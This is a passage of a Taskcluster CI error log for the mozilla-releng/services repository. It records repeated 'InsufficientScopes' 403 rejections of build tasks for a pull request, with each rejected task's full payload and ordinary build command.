\\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"TYYIhTKuT5K4cOIFlCtG7A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.980Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.980Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.980Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.136Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"TYYIhTKuT5K4cOIFlCtG7A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.980Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.980Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.980Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.136Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"TYYIhTKuT5K4cOIFlCtG7A\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:13:12.980Z\",\n                    \"deadline\": \"2016-09-24T12:13:12.980Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"MzkVMxuRS9-w0yD0urG5OA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:13:12.980Z\"\n                },\n                \"time\": \"2016-09-23T12:13:13.136Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"RSZ5Afp_QUaBT-SQNP94xQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.982Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.982Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.982Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.136Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"RSZ5Afp_QUaBT-SQNP94xQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.982Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.982Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.982Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.136Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"RSZ5Afp_QUaBT-SQNP94xQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:13:12.982Z\",\n                    \"deadline\": \"2016-09-24T12:13:12.982Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"MzkVMxuRS9-w0yD0urG5OA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:13:12.982Z\"\n                },\n                \"time\": \"2016-09-23T12:13:13.136Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"LGmOLf9eQE2JdEBb0CI7tw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": 